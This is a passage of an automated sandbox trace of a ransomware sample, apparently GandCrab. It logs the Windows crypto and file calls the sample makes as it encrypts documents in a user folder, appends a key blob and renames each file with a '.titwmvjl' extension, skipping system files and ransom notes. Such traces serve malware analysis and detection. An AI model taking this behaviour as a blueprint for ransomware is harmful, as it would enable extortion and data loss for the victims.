dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.333] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.333] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0090.335] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.335] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.335] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.335] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e240 | out: pbBuffer=0x259e240) returned 1 [0090.335] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.335] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.335] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.335] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.335] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0090.337] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.337] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x503778) returned 1 [0090.337] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.337] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0090.337] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.337] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0090.337] GetLastError () returned 0x0 [0090.337] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.337] CryptDestroyKey (hKey=0x503778) returned 1 [0090.338] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.338] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.338] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.338] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0090.339] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.339] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x503778) returned 1 [0090.339] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.340] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0090.340] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.340] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0090.340] GetLastError () returned 0x0 [0090.340] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.340] CryptDestroyKey (hKey=0x503778) returned 1 [0090.341] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.341] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.341] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.341] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.341] ReadFile (in: hFile=0x2dc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e264, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e264*=0xa1a2, lpOverlapped=0x0) returned 1 [0090.347] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xffff5e5e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.347] WriteFile (in: hFile=0x2dc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xa1a2, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e248*=0xa1a2, lpOverlapped=0x0) returned 1 [0090.349] WriteFile (in: hFile=0x2dc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e248*=0x21c, lpOverlapped=0x0) returned 1 [0090.350] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.354] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.354] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.354] CloseHandle (hObject=0x2dc) returned 1 [0090.355] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\wlly.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\wlly.pptx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\wlly.pptx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\wlly.pptx.titwmvjl"), dwFlags=0x1) returned 1 [0090.355] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.356] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0090.356] lstrcmpW (lpString1="ZgaaFByxvb.doc", lpString2=".") returned 1 [0090.356] lstrcmpW (lpString1="ZgaaFByxvb.doc", lpString2="..") returned 1 [0090.356] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\", lpString2="ZgaaFByxvb.doc" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\ZgaaFByxvb.doc") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\ZgaaFByxvb.doc" [0090.356] lstrlenW (lpString=".titwmvjl") returned 9 [0090.356] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\ZgaaFByxvb.doc") returned 138 [0090.356] VirtualAlloc (lpAddress=0x0, dwSize=0x154, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.356] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\ZgaaFByxvb.doc.titwmvjl") returned 147 [0090.356] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\ZgaaFByxvb.doc") returned 138 [0090.356] lstrlenW (lpString=".doc") returned 4 [0090.356] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.356] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".doc ") returned 5 [0090.356] lstrcmpiW (lpString1=".doc", lpString2=".titwmvjl") returned -1 [0090.356] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.357] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\ZgaaFByxvb.doc") returned 138 [0090.357] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\ZgaaFByxvb.doc") returned 138 [0090.357] lstrcmpiW (lpString1="ZgaaFByxvb.doc", lpString2="desktop.ini") returned 1 [0090.357] lstrcmpiW (lpString1="ZgaaFByxvb.doc", lpString2="autorun.inf") returned 1 [0090.357] lstrcmpiW (lpString1="ZgaaFByxvb.doc", lpString2="ntuser.dat") returned 1 [0090.357] lstrcmpiW (lpString1="ZgaaFByxvb.doc", lpString2="iconcache.db") returned 1 [0090.357] lstrcmpiW (lpString1="ZgaaFByxvb.doc", lpString2="bootsect.bak") returned 1 [0090.357] lstrcmpiW (lpString1="ZgaaFByxvb.doc", lpString2="boot.ini") returned 1 [0090.357] lstrcmpiW (lpString1="ZgaaFByxvb.doc", lpString2="ntuser.dat.log") returned 1 [0090.357] lstrcmpiW (lpString1="ZgaaFByxvb.doc", lpString2="thumbs.db") returned 1 [0090.357] lstrcmpiW (lpString1="ZgaaFByxvb.doc", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0090.357] lstrcmpiW (lpString1="ZgaaFByxvb.doc", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0090.357] lstrcmpiW (lpString1="ZgaaFByxvb.doc", lpString2="KRAB-DECRYPT.html") returned 1 [0090.357] lstrcmpiW (lpString1="ZgaaFByxvb.doc", lpString2="CRAB-DECRYPT.html") returned 1 [0090.357] lstrcmpiW (lpString1="ZgaaFByxvb.doc", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.357] lstrcmpiW (lpString1="ZgaaFByxvb.doc", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.357] lstrcmpiW (lpString1="ZgaaFByxvb.doc", lpString2="ntldr") returned 1 [0090.357] lstrcmpiW (lpString1="ZgaaFByxvb.doc", lpString2="NTDETECT.COM") returned 1 [0090.357] lstrcmpiW (lpString1="ZgaaFByxvb.doc", lpString2="Bootfont.bin") returned 1 [0090.357] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\ZgaaFByxvb.doc") returned 138 [0090.357] lstrlenW (lpString=".doc") returned 4 [0090.357] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.357] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".doc ") returned 5 [0090.357] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.357] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.357] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\ZgaaFByxvb.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\zgaafbyxvb.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2dc [0090.358] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.358] ReadFile (in: hFile=0x2dc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e264, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e264*=0x21c, lpOverlapped=0x0) returned 1 [0090.359] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.359] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.359] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0090.360] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.361] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.361] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.361] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e220 | out: pbBuffer=0x259e220) returned 1 [0090.361] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.361] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.361] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.361] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.361] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0090.363] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.363] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.363] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.363] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e240 | out: pbBuffer=0x259e240) returned 1 [0090.363] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.363] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.363] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.364] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.364] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0090.365] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.365] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x503338) returned 1 [0090.365] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.365] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0090.365] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.365] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0090.366] GetLastError () returned 0x0 [0090.366] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.366] CryptDestroyKey (hKey=0x503338) returned 1 [0090.366] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.366] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.366] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.366] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0090.367] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.367] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x503778) returned 1 [0090.367] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.367] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0090.368] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.368] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0090.368] GetLastError () returned 0x0 [0090.368] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.368] CryptDestroyKey (hKey=0x503778) returned 1 [0090.368] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.368] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.368] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.369] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.369] ReadFile (in: hFile=0x2dc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e264, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e264*=0x1638c, lpOverlapped=0x0) returned 1 [0090.376] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffe9c74, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.376] WriteFile (in: hFile=0x2dc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1638c, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e248*=0x1638c, lpOverlapped=0x0) returned 1 [0090.379] WriteFile (in: hFile=0x2dc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e248*=0x21c, lpOverlapped=0x0) returned 1 [0090.380] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.383] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.384] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.384] CloseHandle (hObject=0x2dc) returned 1 [0090.385] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\ZgaaFByxvb.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\zgaafbyxvb.doc"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\ZgaaFByxvb.doc.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\zgaafbyxvb.doc.titwmvjl"), dwFlags=0x1) returned 1 [0090.385] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.385] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 0 [0090.385] FindClose (in: hFindFile=0x5038f8 | out: hFindFile=0x5038f8) returned 1 [0090.386] CloseHandle (hObject=0x248) returned 1 [0090.387] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0090.387] lstrcmpW (lpString1="c548WJ5bDz2QDCDTDVr.ods", lpString2=".") returned 1 [0090.387] lstrcmpW (lpString1="c548WJ5bDz2QDCDTDVr.ods", lpString2="..") returned 1 [0090.387] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\", lpString2="c548WJ5bDz2QDCDTDVr.ods" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\c548WJ5bDz2QDCDTDVr.ods") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\c548WJ5bDz2QDCDTDVr.ods" [0090.387] lstrlenW (lpString=".titwmvjl") returned 9 [0090.387] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\c548WJ5bDz2QDCDTDVr.ods") returned 132 [0090.387] VirtualAlloc (lpAddress=0x0, dwSize=0x148, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.387] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\c548WJ5bDz2QDCDTDVr.ods.titwmvjl") returned 141 [0090.387] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\c548WJ5bDz2QDCDTDVr.ods") returned 132 [0090.387] lstrlenW (lpString=".ods") returned 4 [0090.387] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.387] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ods ") returned 5 [0090.388] lstrcmpiW (lpString1=".ods", lpString2=".titwmvjl") returned -1 [0090.388] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.388] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\c548WJ5bDz2QDCDTDVr.ods") returned 132 [0090.388] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\c548WJ5bDz2QDCDTDVr.ods") returned 132 [0090.388] lstrcmpiW (lpString1="c548WJ5bDz2QDCDTDVr.ods", lpString2="desktop.ini") returned -1 [0090.388] lstrcmpiW (lpString1="c548WJ5bDz2QDCDTDVr.ods", lpString2="autorun.inf") returned 1 [0090.388] lstrcmpiW (lpString1="c548WJ5bDz2QDCDTDVr.ods", lpString2="ntuser.dat") returned -1 [0090.388] lstrcmpiW (lpString1="c548WJ5bDz2QDCDTDVr.ods", lpString2="iconcache.db") returned -1 [0090.388] lstrcmpiW (lpString1="c548WJ5bDz2QDCDTDVr.ods", lpString2="bootsect.bak") returned 1 [0090.388] lstrcmpiW (lpString1="c548WJ5bDz2QDCDTDVr.ods", lpString2="boot.ini") returned 1 [0090.388] lstrcmpiW (lpString1="c548WJ5bDz2QDCDTDVr.ods", lpString2="ntuser.dat.log") returned -1 [0090.388] lstrcmpiW (lpString1="c548WJ5bDz2QDCDTDVr.ods", lpString2="thumbs.db") returned -1 [0090.388] lstrcmpiW (lpString1="c548WJ5bDz2QDCDTDVr.ods", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0090.388] lstrcmpiW (lpString1="c548WJ5bDz2QDCDTDVr.ods", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0090.388] lstrcmpiW (lpString1="c548WJ5bDz2QDCDTDVr.ods", lpString2="KRAB-DECRYPT.html") returned -1 [0090.388] lstrcmpiW (lpString1="c548WJ5bDz2QDCDTDVr.ods", lpString2="CRAB-DECRYPT.html") returned -1 [0090.388] lstrcmpiW (lpString1="c548WJ5bDz2QDCDTDVr.ods", lpString2="KRAB-DECRYPT.txt") returned -1 [0090.388] lstrcmpiW (lpString1="c548WJ5bDz2QDCDTDVr.ods", lpString2="CRAB-DECRYPT.txt") returned -1 [0090.388] lstrcmpiW (lpString1="c548WJ5bDz2QDCDTDVr.ods", lpString2="ntldr") returned -1 [0090.388] lstrcmpiW (lpString1="c548WJ5bDz2QDCDTDVr.ods", lpString2="NTDETECT.COM") returned -1 [0090.388] lstrcmpiW (lpString1="c548WJ5bDz2QDCDTDVr.ods", lpString2="Bootfont.bin") returned 1 [0090.388] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\c548WJ5bDz2QDCDTDVr.ods") returned 132 [0090.388] lstrlenW (lpString=".ods") returned 4 [0090.388] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.388] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".ods ") returned 5 [0090.388] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.388] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.389] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\c548WJ5bDz2QDCDTDVr.ods" (normalized: 